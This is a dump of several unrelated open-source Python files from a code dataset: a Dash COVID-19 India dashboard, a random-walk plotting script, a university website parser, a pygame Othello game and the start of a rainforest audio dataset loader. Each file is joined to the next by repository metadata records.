'States/UT')\r\nstate_data['Mortality rate'] = (state_data['Deceased'].map(int)/state_data['Population'].map(int))*100\r\n\r\nurl=\"https://datahub.io/core/covid-19/r/countries-aggregated.csv\"\r\ns=requests.get(url, headers= headers).text\r\n\r\ndf_con=pd.read_csv(StringIO(s)) ## per country cases per day\r\n\r\nurl=\"https://datahub.io/core/covid-19/r/worldwide-aggregated.csv\"\r\n\r\ns=requests.get(url, headers= headers).text\r\n\r\ndf_world=pd.read_csv(StringIO(s)) ## worldwide-cases per day\r\n\r\nd = pd.read_csv('AgeGroupDetails.csv')\r\nd['Percentage'] = (d['Percentage'].str.strip('%').astype(float))\r\n\r\nbeds = pd.read_csv('HospitalBedsIndia.csv')\r\nbeds['Total'] = beds['NumUrbanBeds_NHP18']+beds['NumRuralBeds_NHP18']+beds['NumPublicBeds_HMIS']\r\nbeds=beds.iloc[:36]\r\n\r\ntests = pd.read_csv(\"ICMRTestingLabs.csv\")\r\ncen = tests.groupby('state')['lab'].count().reset_index()\r\n\r\nurl=\"https://www.worldometers.info/coronavirus/\"\r\ns=requests.get(url, headers= headers).text\r\ndf5=pd.read_html(StringIO(s))\r\ntest5 = df5[0]['TotalTests']\r\ncountry5=df5[0]['Country,Other']\r\n\r\n\r\ndef read_from_api(URL):\r\n response = request(url=URL, method='get')\r\n x = URL.split('/').pop(-1)\r\n x = x[:-5]\r\n elevations = response.json()\r\n rec = elevations[x]\r\n return json_normalize(rec)\r\n\r\ndf_raw_data = read_from_api('https://api.covid19india.org/raw_data.json')\r\ngender = df_raw_data.groupby('detectedstate')['gender'].count()\r\ngdm = df_raw_data[df_raw_data['gender']=='M']\r\ngen1 = gdm.groupby('detectedstate')['gender'].count().reset_index()\r\n\r\ngdf = df_raw_data[df_raw_data['gender']=='F']\r\ngen2 = gdf.groupby('detectedstate')['gender'].count().reset_index()\r\n\r\npop = pd.read_csv('population_india_census2011.csv')\r\npop.rename(columns={'State / Union Territory': 'States/UT'}, inplace = True)\r\n\r\ndf_raw_data.rename(columns={'detectedstate': 'States/UT'}, inplace = True)\r\n\r\ndf1 = pop[pop['States/UT'].isin(['list_']) == False]\r\n\r\ndf_raw_data = pd.merge(df_raw_data,df1,on = 'States/UT')\r\n\r\ntest = pd.read_csv('StatewiseTestingDetails.csv')\r\n\r\ngender = df_raw_data.groupby('States/UT')['gender'].count()\r\ngdm = df_raw_data[df_raw_data['gender']=='M']\r\ngen1 = gdm.groupby('States/UT')['gender'].count().reset_index()\r\n\r\ngdf = df_raw_data[df_raw_data['gender']=='F']\r\ngen2 = gdf.groupby('States/UT')['gender'].count().reset_index()\r\n\r\ngen1=pd.merge(gen1,df,on = 'States/UT')\r\ngen1['gp']=(gen1['gender'].map(int)/gen1['Population'].map(int))*100\r\n\r\ngen2=pd.merge(gen2,df,on = 'States/UT')\r\ngen2['gp']=(gen2['gender'].map(int)/gen2['Population'].map(int))*100\r\n\r\ni = test['Negative'].sum()\r\nj = test['Positive'].sum()\r\ntest_s = {'label':['Negative test','Positive test'],'number':[i,j]}\r\ndata_p=pd.DataFrame(test_s)\r\n\r\nt = {'Country,Other':country5,'number':test5}\r\np_=pd.DataFrame(t)\r\nac = p_[p_['Country,Other'] =='India']\r\n\r\n#counting world data\r\na=df_world.shape[0]\r\nConfirmed_world=df_world[['Date','Confirmed']].iloc[a-1].reset_index().iloc[1,1]\r\nRecovered_world=df_world[['Date','Recovered']].iloc[a-1].reset_index().iloc[1,1]\r\nDeaths_world=df_world[['Date','Deaths']].iloc[a-1].reset_index().iloc[1,1]\r\n\r\n#adding 2 columns\r\nstate_data['Fatality rate'] = (state_data['Deceased'].map(int)/state_data['Confirmed'].map(int))*100\r\nstate_data['Recovery rate'] = (state_data['Recovered'].map(int)/state_data['Confirmed'].map(int))*100\r\n\r\n# Plot Line Chart here\r\n\r\ntrace = go.Scatter(x=state_data['States/UT'], y=state_data['Confirmed'],\r\n mode='lines+markers',\r\n marker={'color': '#030808'}, name='Confirmed')\r\n\r\ntrace1 = go.Scatter(x=state_data['States/UT'], y=state_data['Deceased'],\r\n mode='lines+markers',marker={'color': '#DC143C'},name='Death')\r\n\r\ntrace2 = go.Scatter(x=state_data['States/UT'], y=state_data['Recovered'],\r\n mode='lines+markers', marker={'color': '#00a65a'}, name='Recovered')\r\n\r\ndata = [trace, trace1, trace2]\r\n\r\nlayout = go.Layout(title='Confirmed vs Death vs Recovered in India',\r\n xaxis={'title': '','automargin' : True},\r\n yaxis={'title': 'Numbers'})\r\n\r\nfig = go.Figure(data=data, layout=layout)\r\n\r\n\r\n#line chart\r\ntrace3=go.Scatter(x=df_world['Date'],y=df_world['Confirmed'],mode='lines+markers',name='Confirmed')\r\ntrace4=go.Scatter(x=df_world['Date'],y=df_world['Deaths'],mode='lines+markers',name='Deaths')\r\ntrace5=go.Scatter(x=df_world['Date'],y=df_world['Recovered'],mode='lines+markers',marker={'color':'#00a65a'},name='Recovered')\r\ndata1=[trace3,trace4,trace5]\r\nlayout1=go.Layout(title='Rise in Covid19 cases per day in the world',xaxis={'title':'Date'},yaxis={'title':'Total cases'})\r\nfig1=go.Figure(data=data1,layout=layout1)\r\n\r\n#piechart\r\ntrace6=go.Pie(labels=d['AgeGroup'],values=d['Percentage'],hole=.3,textposition='inside', textfont_size=14)\r\n\r\ndata2=[trace6]\r\n\r\nlayout2=go.Layout(title='Age probability to get affected by the virus')\r\n\r\nfig2=go.Figure(data=data2,layout=layout2)\r\n\r\n#stacked bar graph\r\ntrace7=go.Bar(x=gen1['States/UT'],y=gen1['gp'], name='Male',\r\n marker={'color':'#00a65a'})\r\n\r\ntrace8=go.Bar(x=gen2['States/UT'],y=gen2['gp'], name='Female',\r\n marker={'color':'#a6a65a'})\r\n\r\ndata3=[trace7,trace8]\r\n\r\nlayout3=go.Layout(title='Gender probability of getting affected in several states',\r\n xaxis={'title':'','automargin': True},\r\n yaxis={'title':'Gender Probability'})\r\n\r\nfig3=go.Figure(data=data3, layout=layout3)\r\n\r\n#bubble plot\r\ntrace9=go.Scatter(x=beds['State/UT'],y=beds['Total'],mode='markers',\r\n marker={'size':beds['Sno']})\r\n\r\ndata4=[trace9]\r\n\r\nlayout4=go.Layout(title='Hospital beds present in each state to fight Covid',\r\n xaxis={'title':''},\r\n yaxis={'title':'Total no. of beds'})\r\n\r\nfig4=go.Figure(data=data4,layout=layout4)\r\n\r\n#bar plot for labs\r\ntrace10 = go.Bar(x=cen['state'],y=cen['lab'])\r\ndata5=trace10\r\nlayout5 =go.Layout(title='Testing centres in different states',\r\n xaxis={'title':'','automargin': True},\r\n yaxis={'title':'Number','automargin': True})\r\nfig5 = go.Figure(data=data5,layout=layout5)\r\n\r\n#pie chart\r\ntrace11=go.Pie(labels=data_p['label'],values=data_p['number'],textposition='inside', textfont_size=14)\r\n\r\ndata6=[trace11]\r\n\r\nlayout6=go.Layout(title='Covid19 test results')\r\n\r\nfig6=go.Figure(data=data6,layout=layout6)\r\n\r\noptions1=[\r\n {'label':'Recovery rate', 'value':'Recovery rate'},\r\n {'label':'Fatality rate', 'value':'Fatality rate'},\r\n {'label':'Mortality rate', 'value':'Mortality rate'}\r\n\r\n]\r\n\r\n\r\noptions=[\r\n {'label':'Confirmed', 'value':'Confirmed'},\r\n {'label':'Recovered', 'value':'Recovered'},\r\n {'label':'Deaths', 'value':'Deaths'},\r\n {'label':'Total Tests for Covid19 done so far', 'value':'TotalTests'},\r\n\r\n]\r\n\r\nexternal_stylesheets = [\r\n {\r\n 'href': 'https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css',\r\n 'rel': 'stylesheet',\r\n 'integrity': 'sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO',\r\n 'crossorigin': 'anonymous',\r\n\r\n }\r\n]\r\n\r\n\r\napp1 = dash.Dash(__name__, external_stylesheets=external_stylesheets)\r\n\r\nserver=app1.server\r\napp1.layout=html.Div([\r\n html.H1(\"Covid19 India Tracker\",style={'color':'#fff','text-align':'center'}),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.H3(\"Confirmed cases in India\", className='text-light'),\r\n html.H4(state_data['Confirmed'].map(int).sum(), className='text-light')\r\n ], className='card-body')\r\n ], className='card bg-danger m-auto')\r\n ], className='col-md-3'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.H3(\"Recovered cases in India\", className='text-light'),\r\n html.H4(state_data['Recovered'].map(int).sum(), className='text-light')\r\n ], className='card-body')\r\n ], className='card bg-success m-auto')\r\n ], className='col-md-3'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.H3(\"Death cases in India\", className='text-light'),\r\n html.H4(state_data['Deceased'].map(int).sum(), className='text-light')\r\n ], className='card-body')\r\n ], className='card bg-warning h-100 m-auto')\r\n ], className='col-md-3'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.H3(\"Active cases in India\", className='text-light'),\r\n html.H4((state_data['Confirmed'].map(int).sum()) - (state_data['Deceased'].map(int).sum()) - (\r\n state_data['Recovered'].map(int).sum()), className='text-light')\r\n ], className='card-body')\r\n ], className='card bg-info h-100 m-auto')\r\n ], className='col-md-3')\r\n ], className='row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Dropdown(id='picker1',options=options ,value='Confirmed'),\r\n dcc.Graph(id='choropleth')\r\n ],className='card-body')\r\n ],className='card bg-dark')\r\n ],className='col-md-12')\r\n ],className = 'row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Graph(id='line chart1',figure=fig1)\r\n ],className='card-body')\r\n ],className='card bg-dark')\r\n ],className='col-md-12')\r\n ],className='row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Graph(id = 'line chart',figure = fig)\r\n ],className='card-body')\r\n ],className='card bg-dark')\r\n ],className='col-md-12')\r\n ],className='row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Dropdown(id='picker', options=options1, value='Recovery rate'),\r\n dcc.Graph(id='bar')\r\n ],className='card-body')\r\n ],className='card bg-dark')\r\n ],className='col-md-12'),\r\n ], className='row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.H3(\"Remember? Prevention is better than cure\",className='bold',style={'color': 'black', 'text-align': 'center'}),\r\n html.H4(\"Check out your probability of getting affected and stay safe\", style={'color': 'black', 'text-align': 'center'})\r\n ], className='card-body')\r\n ], className='card bg-warning')\r\n ], className='col-md-12'),\r\n ], className='row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Graph(id='Pie1',figure=fig2)\r\n ], className='card-body')\r\n ], className='card bg-dark')\r\n ], className='col-md-6'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Graph(id='Bar',figure=fig3)\r\n ], className='card-body')\r\n ], className='card bg-dark ')\r\n ], className='col-md-6'),\r\n ], className='row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.H3(\"Total number of Covid19 tests taken place in India till date\", className='text-light',style={'text-align': 'center'}),\r\n html.H4(ac['number'].map(int), className='text-light',style={'text-align': 'center'})\r\n ], className='card-body')\r\n ], className='card bg-info')\r\n ], className='col-md-12'),\r\n ], className='row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Graph(id='Pie chart',figure=fig6)\r\n ],className='card-body')\r\n ],className='card bg-dark ')\r\n ],className='col-md-6'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Graph(id='Bar1',figure=fig5)\r\n ], className='card-body')\r\n ], className='card bg-dark')\r\n ], className='col-md-6'),\r\n ], className='row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Graph(id='Bubble',figure=fig4)\r\n ], className='card-body')\r\n ], className='card bg-dark')\r\n ], className='col-md-12')\r\n ], className='row'),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.H3(\"STAY HOME,STAY SAFE\", className='bold',style={'color': 'grey', 'text-align': 'center'}),\r\n html.H6('@TEAM-SHIVAJI', style={'color': 'grey', 'text-align': 'center'}),\r\n ], className='card-body')\r\n ], className='card bg-dark')\r\n ], className='col-md-12')\r\n ], className='row')\r\n\r\n],className = 'container')\r\n\r\n\r\n@app1.callback(Output('bar','figure'),[Input('picker','value')])\r\ndef update_graph(type):\r\n if type=='Recovery rate':\r\n return {'data':[go.Bar(x=state_data['States/UT'],y=state_data['Recovery rate'],marker_color='green')],\r\n 'layout':go.Layout(title='Recovery rate in India',\r\n xaxis={'title':'','automargin' : True},\r\n yaxis={'title':'Recovery rate'})}\r\n elif type=='Fatality rate':\r\n return {'data': [go.Bar(x=state_data['States/UT'],y=state_data['Fatality rate'],marker_color='crimson')],\r\n 'layout': go.Layout(title='Fatality rate in India',\r\n xaxis={'title':'','automargin': True},\r\n yaxis={'title':'Fatality rate'})}\r\n else:\r\n return {'data': [go.Bar(x=state_data['States/UT'], y=state_data['Mortality rate'], marker_color='indianred')],\r\n 'layout': go.Layout(title='Mortality rate in India',\r\n xaxis={'title': '', 'automargin': True},\r\n yaxis={'title': 'Mortality rate'})}\r\n\r\n\r\n\r\n@app1.callback(Output('choropleth', 'figure'), [Input('picker1', 'value')])\r\ndef update_graph(type):\r\n if type == 'Confirmed':\r\n dff = df_con.groupby('Country')['Confirmed'].max().reset_index()\r\n return {'data': [go.Choropleth(locations=dff['Country'], z=dff['Confirmed'],autocolorscale=False,\r\n locationmode='country names',colorscale='rainbow',\r\n marker={'line':{'color':'rgb(180,180,180)','width':0.5}},\r\n colorbar={'thickness':15,'len':1.,'x':0.9,'y':0.7,\r\n 'title':{'text':'Confirmed','side':'bottom'}})],\r\n 'layout': go.Layout(title='Confirmed cases all over the world, to see where exactly India stands')}\r\n elif type == 'Recovered':\r\n dff1 = df_con.groupby('Country')['Recovered'].max().reset_index()\r\n return {'data': [go.Choropleth(locations=dff1['Country'], z=dff1['Recovered'],autocolorscale=False,\r\n locationmode='country names',colorscale='rainbow',\r\n marker={'line':{'color':'rgb(255,255,255)','width':0.5}},\r\n colorbar={'thickness':15,'len':1,'x':0.9,'y':0.7,\r\n 'title':{'text':'Recovered','side':'bottom'}})],\r\n 'layout': go.Layout(title='Recovered cases all over the world, to see where exactly India stands')}\r\n elif type== 'Deaths' :\r\n dff2 = df_con.groupby('Country')['Deaths'].max().reset_index()\r\n return {'data': [go.Choropleth(locations=dff2['Country'], z=dff2['Deaths'],autocolorscale=False,\r\n locationmode='country names',colorscale='rainbow',\r\n marker={'line':{'color':'rgb(255,255,255)','width':0.5}},\r\n colorbar={'thickness':15,'len':1,'x':0.9,'y':0.7,\r\n 'title':{'text':'Deaths','side':'bottom'}})],\r\n 'layout': go.Layout(title='Death cases all over the world,to see where exactly India stands')}\r\n else:\r\n return {'data': [go.Choropleth(locations=country5, z=test5, autocolorscale=False,\r\n locationmode='country names', colorscale='rainbow',\r\n marker={'line': {'color': 'rgb(255,255,255)', 'width': 0.5}},\r\n colorbar={'thickness': 15, 'len': 1, 'x': 0.9, 'y': 0.7,\r\n 'title': {'text': 'Total Tests', 'side': 'bottom'}})],\r\n 'layout': go.Layout(title='Total Tests all over the world,to see where exactly India stands')}\r\n\r\n\r\nif __name__==\"__main__\":\r\n app1.run_server(debug=False)\r\n","repo_name":"incubateind/Hack-For-Good","sub_path":"Sharika Anjum Mondal/Team - Shivaji covid-19 dashboard/app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":18810,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"33316493292","text":"from matplotlib import pyplot as plt\r\nfrom probabilityFunctions import *\r\n\r\ndef simpleRandomWalk(k,plot=\"True\"): #This function is a simple random walk with equally probable outcomes \r\n n_values = []\r\n while k !=0:\r\n n_values.append(int(input(\"Please enter step a value (n): \")))\r\n k -= 1 \r\n n_values = tuple(n_values)\r\n for i in n_values:\r\n num = n_values.index(i)\r\n probPlot(probability(i,0.5),num,i)\r\n if plot == \"True\":\r\n plt.show()\r\n else: \r\n pass \r\n\r\ndef biasedRandomWalk(n,first,second, plot=\"True\"): # Biased random walk with variable likelihood of Success or Failure \r\n data0 = probability(n,0.5) # Equally probable outcomes\r\n data1 = probability(n,first) # Variable likelihood of success 1 \r\n data2 = probability(n,second) # Variable liklihood of success 2\r\n plotThreeProbs(data0 ,data1,data2,first,second,n)\r\n plt.show()\r\n \r\n#simpleRandomWalk(4,plot=\"False\")\r\nbiasedRandomWalk(100,0.6,0.4)\r\n","repo_name":"ConorBoyle461/Analytics","sub_path":"scripts/python/fyp/binomialProbability.py","file_name":"binomialProbability.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15724043936","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nfrom .handlers.independents.announces import announces\nfrom .handlers.independents.contests import contests\nfrom .handlers.independents.educationalPublications import educationalPublications\nfrom .handlers.independents.timetable.getAllGroups import getAllGroups\nfrom .handlers.independents.timetable.getGroupTimetable import getGroupTimetable\n\n\n# infoType - тип информации, которую нужно спарсить\n# query - строка запроса, если используется (необязательная)\n\n# Типы:\n# - announces - анонсы\n# - contests - конкурсы\n# - educationalPublications - учебные пособия (требуется query)\n# - timetable.getAllGroups - получить все группы по форме обучения и курсу\n# - timetable.getGroupTimetable - получить все занятия группы по имени группы и форме обучения\n\ndef parser(infoType, query='', lang='ru-RU'):\n types = {\n # 'url': 'https://news.itmo.ru/ru/events/', \n # 'url': 'https://news.itmo.ru/ru/events/', \n \n 'announces': {'handler': announces},\n 'contests': {'handler': contests},\n 'educationalPublications': {'handler': educationalPublications},\n 'timetable.getAllGroups': {'handler': getAllGroups},\n 'timetable.getGroupTimetable': {'handler': getGroupTimetable}\n }\n\n if not infoType in types:\n raise TypeError('Unknown type')\n\n if not 'url' in types[infoType]:\n return types[infoType]['handler'](query, lang)\n\n try:\n r = requests.get(types[infoType]['url'])\n except:\n return False\n\n soup = bs(r.text, \"html.parser\")\n\n return types[infoType]['handler'](soup)\n","repo_name":"coder-medved/YandexSkill_ITMO","sub_path":"src/backend/utils/parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12052939128","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport logging\nimport math\nfrom typing import List\n\nimport pygame\n\nimport logic\nimport utils\nimport server_2 as server\nimport client_2 as client\nfrom framework import Widget, Label, ReverseColorButton\nfrom constants import *\n\n\nclass ChessPiece(Widget):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.center = kwargs.get('center', self.center)\n self.color = kwargs.get('color', THECOLORS['black'])\n self.border_width = kwargs.get('border_width', 2.5)\n self.border_color = kwargs.get('border_color', THECOLORS['black'])\n self.callback = kwargs.get('callback', None)\n\n if self.width != self.height:\n raise ValueError('width != height for chess piece')\n\n @property\n def radius(self):\n return self.width / 2\n\n def collide_point(self, x, y):\n center = self.center\n return math.hypot(x - center[0], y - center[1]) <= self.radius\n\n def on_mouse_down(self, pos, button):\n if self.collide_point(*pos):\n if self.disabled:\n return True\n if self.callback is not None:\n if self.callback(pos, button):\n return True\n\n def _draw(self, win: pygame.Surface, dt: int):\n pygame.draw.circle(win, self.border_color, self.center, self.radius)\n pygame.draw.circle(win, self.color, self.center, self.radius - self.border_width)\n\n\nclass OthelloWorld(Widget):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.game = kwargs['game'] # type: Game\n\n self._setup_ui()\n\n def _setup_ui(self):\n # Create sprites.\n _piece_radius = (CONF.U.BOARD_EDGES['right'] - CONF.U.BOARD_EDGES['left']) / CONF.G.BOARD_WIDTH / 2 - 5.0\n\n def _piece_pos(i, j):\n return (CONF.U.BOARD_EDGES['left'] + (CONF.U.BOARD_EDGES['right'] - CONF.U.BOARD_EDGES['left']) /\n CONF.G.BOARD_WIDTH * (j + 0.5),\n CONF.U.BOARD_EDGES['top'] + (CONF.U.BOARD_EDGES['bottom'] - CONF.U.BOARD_EDGES['top']) /\n CONF.G.BOARD_HEIGHT * (i + 0.5))\n\n def _callback_factory(i, j):\n def _callback(pos, button, i=i, j=j):\n if self.game.status != 'running':\n return False\n self.game.take_action({\n 'type': 'play',\n 'i': i, 'j': j,\n 'player_id': self.game.state.current_player_id,\n })\n return True\n return _callback\n\n self.board_pieces = [[ # type: List[List[ChessPiece]]\n self.add_child(ChessPiece(\n center=_piece_pos(i, j),\n width=2 * _piece_radius, height=2 * _piece_radius,\n color=THECOLORS['white'],\n visible=False, callback=_callback_factory(i, j),\n ))\n for j in range(CONF.G.BOARD_WIDTH)\n ] for i in range(CONF.G.BOARD_HEIGHT)]\n\n self.player_labels = {\n 0: self.add_child(Label(\n text='玩家0',\n color=THECOLORS['red'],\n center=CONF.U.PLAYER_LABEL_POS[0],\n )),\n 1: self.add_child(Label(\n text='玩家1',\n color=THECOLORS['blue'],\n center=CONF.U.PLAYER_LABEL_POS[1],\n )),\n }\n self.player_status_labels = {\n 0: self.add_child(Label(\n text='胜', color=THECOLORS['black'],\n center=(CONF.U.CURR_PLAYER_LABEL_X, CONF.U.PLAYER_LABEL_POS[0][1]),\n visible=False,\n )),\n 1: self.add_child(Label(\n text='胜', color=THECOLORS['black'],\n center=(CONF.U.CURR_PLAYER_LABEL_X, CONF.U.PLAYER_LABEL_POS[1][1]),\n visible=False,\n )),\n }\n\n self.current_player_tag = self.add_child(ChessPiece(\n color=THECOLORS['black'],\n width=2 * _piece_radius, height=2 * _piece_radius,\n visible=False,\n ))\n self.current_player_tag.center_x = CONF.U.CURR_PLAYER_LABEL_X\n\n self.single_start_btn = self.add_child(ReverseColorButton(\n text='单机启动', font_size=48,\n width=48 * 5 + 8, height=48 + 8,\n callback=self.game.single_start,\n center=CONF.U.PLAY_BTN_POS['single'],\n ))\n self.start_server_btn = self.add_child(ReverseColorButton(\n text='启动服务器', font_size=48,\n width=48 * 5 + 8, height=48 + 8,\n callback=self.game.start_server,\n center=CONF.U.PLAY_BTN_POS['server'],\n ))\n self.join_game_btn = self.add_child(ReverseColorButton(\n text='加入游戏', font_size=48,\n width=48 * 5 + 8, height=48 + 8,\n callback=self.game.join_game,\n center=CONF.U.PLAY_BTN_POS['join'],\n ))\n self.quit_game_btn = self.add_child(ReverseColorButton(\n text='退出游戏', font_size=48,\n width=48 * 5 + 8, height=48 + 8,\n callback=self.game.exit_game,\n center=CONF.U.PLAY_BTN_POS['exit'],\n ))\n\n def on_update(self, state_dict):\n state = self.game.state\n board = state.board\n valid_pos = set(board.valid_pos(state.current_player_id))\n\n for i, j, p in board.iter_board():\n piece = self.board_pieces[i][j]\n\n if p is None:\n piece.visible = False\n\n piece.disabled = (i, j) not in valid_pos\n else:\n piece.visible = True\n piece.disabled = True\n piece.color = state.players[p].color\n\n if self.game.status == 'running':\n self.current_player_tag.visible = True\n self.current_player_tag.center_y = CONF.U.PLAYER_LABEL_POS[state.current_player_id][1]\n self.current_player_tag.color = CONF.U.PLAYER_COLORS[state.current_player_id]\n\n counter = board.count_players()\n for i, label in self.player_labels.items():\n label.text = f'玩家{i}:{counter[i]}'\n else:\n self.current_player_tag.visible = False\n for i, label in self.player_labels.items():\n label.text = f'玩家{i}'\n\n for i, label in self.player_status_labels.items():\n ps = state.players[i].status\n _d = {\n 'win': '胜', 'lose': '负', 'draw': '平',\n }\n ps_str = _d.get(ps, None)\n if ps_str is None:\n label.visible = False\n else:\n label.visible = True\n label.text = ps_str\n\n def _draw(self, win: pygame.Surface, dt: int):\n win.fill(THECOLORS['white'])\n\n # Board\n for j in range(CONF.G.BOARD_WIDTH + 1):\n x_pos = CONF.U.BOARD_EDGES['left'] + j * (CONF.U.BOARD_EDGES['right'] - CONF.U.BOARD_EDGES['left']) / CONF.G.BOARD_WIDTH\n pygame.draw.line(\n win, CONF.U.BOARD_EDGE_COLOR,\n (x_pos, CONF.U.BOARD_EDGES['top']),\n (x_pos, CONF.U.BOARD_EDGES['bottom']),\n CONF.U.BOARD_LINE_WIDTH,\n )\n for i in range(CONF.G.BOARD_HEIGHT + 1):\n y_pos = CONF.U.BOARD_EDGES['top'] + i * (CONF.U.BOARD_EDGES['bottom'] - CONF.U.BOARD_EDGES['top']) / CONF.G.BOARD_HEIGHT\n pygame.draw.line(\n win, CONF.U.BOARD_EDGE_COLOR,\n (CONF.U.BOARD_EDGES['left'], y_pos),\n (CONF.U.BOARD_EDGES['right'], y_pos),\n CONF.U.BOARD_LINE_WIDTH,\n )\n\n for child in self.children[:]:\n draw_fn = getattr(child, 'draw', None)\n if draw_fn is not None:\n draw_fn(win, dt)\n\n\nclass UI:\n def __init__(self, game: 'Game', width, height, caption='Game'):\n self.game = game\n self.width = width\n self.height = height\n self.caption = caption\n self.window: pygame.Surface\n self.clock: pygame.time.Clock\n self.root: OthelloWorld\n\n def initialize(self):\n pygame.init()\n self.window = pygame.display.set_mode((self.width, self.height))\n pygame.display.set_caption(self.caption)\n\n self.root = OthelloWorld(game=self.game, width=self.width, height=self.height)\n\n self.clock = pygame.time.Clock()\n\n def finalize(self):\n pygame.quit()\n\n def dispatch_pygame_event(self, event: pygame.event.Event):\n return self.root.dispatch_pygame_event(event)\n\n def draw(self, dt):\n self.root.draw(self.window, dt)\n pygame.display.update()\n\n\nclass Game:\n \"\"\"Game = UI(EventDispatcher) + State + Client + Server (optional)\"\"\"\n def __init__(self):\n self.ui = UI(self, CONF.U.WIDTH, CONF.U.HEIGHT, 'Othello')\n self.state = logic.GameState()\n self.server = None\n self.client = None\n self.status = 'idle'\n\n def initialize(self):\n self.ui.initialize()\n self.status = 'waiting'\n\n def finalize(self):\n self.status = 'idle'\n if self.server is not None:\n self.server.stop()\n self.ui.finalize()\n\n def run(self):\n self.initialize()\n\n try:\n while self.status in {'idle', 'waiting', 'running'}:\n dt = self.ui.clock.tick(CONF.U.FPS)\n\n for event in pygame.event.get(): # type: pygame.event.Event\n if event.type == pygame.QUIT:\n if self.ui.dispatch_pygame_event(event):\n # SIGTERM processed by widgets\n continue\n self.status = 'stopped'\n else:\n self.ui.dispatch_pygame_event(event)\n\n self.ui.draw(dt)\n finally:\n self.finalize()\n\n def update_game_status(self):\n if self.state.game_end():\n self.status = 'idle'\n\n def take_action(self, action: dict):\n logging.debug(f'take action: status={self.status}, action={action}')\n if action['type'] not in {'init', 'reset'} and self.status != 'running':\n return\n\n server_reply = self.client.send_action(action)\n self.state.load_state_dict(server_reply)\n self.update_game_status()\n utils.push_event(CONF.G.UPDATE_EVENT, state_dict=server_reply)\n\n def single_start(self, pos, button):\n if self.server is None:\n self.server = server.LocalThreadingServer()\n else:\n self.take_action({'type': 'reset'})\n if self.client is None:\n self.client = client.LocalClient(self.server)\n self.take_action({'type': 'init', 'ip_address': '', 'name': '玩家0'})\n self.take_action({'type': 'init', 'ip_address': '', 'name': '玩家1'})\n self.status = 'running'\n\n def start_server(self, pos, button):\n print('Starting server')\n\n def join_game(self, pos, button):\n print('Join game')\n\n def exit_game(self, pos, button):\n utils.push_event(pygame.QUIT)\n\n\ndef main():\n logging.basicConfig(\n level=logging.DEBUG,\n )\n\n game = Game()\n game.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fyabc/Toys","sub_path":"LearnMultiplayerGame/main_othello.py","file_name":"main_othello.py","file_ext":"py","file_size_in_byte":11332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24038890423","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\nimport csv\nimport librosa\nimport numpy as np\nfrom skimage.transform import resize\nfrom PIL import Image\nimport time\n\nimport os\nimport torch\nimport random\n\nnum_birds = 24\n# 6GB GPU-friendly (~4 GB used by model)\n# Increase if neccesary\nbatch_size = 16\n\n# This is enough to exactly reproduce results on local machine (Windows / Turing GPU)\n# Kaggle GPU kernels (Linux / Pascal GPU) are not deterministic even with random seeds set\n# Your score might vary a lot (~up to 0.05) on a different runs due to picking different epochs to submit\nrng_seed = 1234\nrandom.seed(rng_seed)\nnp.random.seed(rng_seed)\nos.environ['PYTHONHASHSEED'] = str(rng_seed)\ntorch.manual_seed(rng_seed)\ntorch.cuda.manual_seed(rng_seed)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\n\n# Model dataset class\n\n# In[4]:\n\n\nimport torch.utils.data as torchdata\n\nclass RainforestDataset(torchdata.Dataset):\n def __init__(self, filelist):\n self.specs = []\n self.labels = []\n for f in filelist:\n # Easier to pass species in filename at the start; worth changing later to more capable method\n label = int(str.split(f, '_')[1])\n label_array = np.zeros(num_birds, dtype=np.single)\n label_array[label] = 1.\n self.labels.append(label_array)\n \n # Open and save spectrogram to memory\n \n # If you use more spectrograms (add train_fp, for example), then they would not all fit to memory\n # In this case you should load them on the fly in __getitem__\n img = Image.open('/Volumes/Software/rfcx-species-audio-detection/working/' + f)\n mel_spec = np.array(img)\n img.close()\n \n # Transforming spectrogram from bmp to 0..1 array\n mel_spec = mel_spec / 255\n # Stacking for 3-channel image for resnet\n mel_spec = np.stack((mel_spec, mel_spec, mel_spec))\n \n self.specs.append(mel_spec)\n \n def __len__(self):\n return len(self.specs)\n \n def __getitem__(self, item):\n # Augment here if you want\n return self.specs[item], self.labels[item]\n\n\n# Split training set on training and validation \n# \n# What StratifiedKFold 